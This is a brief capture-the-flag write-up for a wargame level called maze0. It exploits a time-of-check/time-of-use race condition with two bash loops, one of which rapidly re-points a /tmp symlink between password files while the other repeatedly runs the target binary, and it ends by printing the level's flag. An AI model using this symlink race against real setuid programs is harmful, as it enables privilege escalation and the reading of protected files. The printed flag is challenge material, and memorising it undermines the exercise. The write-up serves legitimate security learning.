in this level we exploit race condition. first it checks access to a file, and then change to higher privileges and print the content of the file. so, we will link it to maze0 privilege, and before it opens the file for reading, we’ll change to maze1 privilege.

#!/bin/bash

while [ true ]; do
        ln -sf /etc/maze_pass/maze0 /tmp/128ecf542a35ac5270a87dc740918404
        ln -sf /etc/maze_pass/maze1 /tmp/128ecf542a35ac5270a87dc740918404
done;

#!/bin/bash

while [ true ]; do
        /maze/maze0
        cat /tmp/128ecf542a35ac5270a87dc740918404 2> /dev/null
done;

then, we’ll run this

./link_script.sh &
./run_script.sh | grep -av "maze0"

Flag: kfL7RRfpkY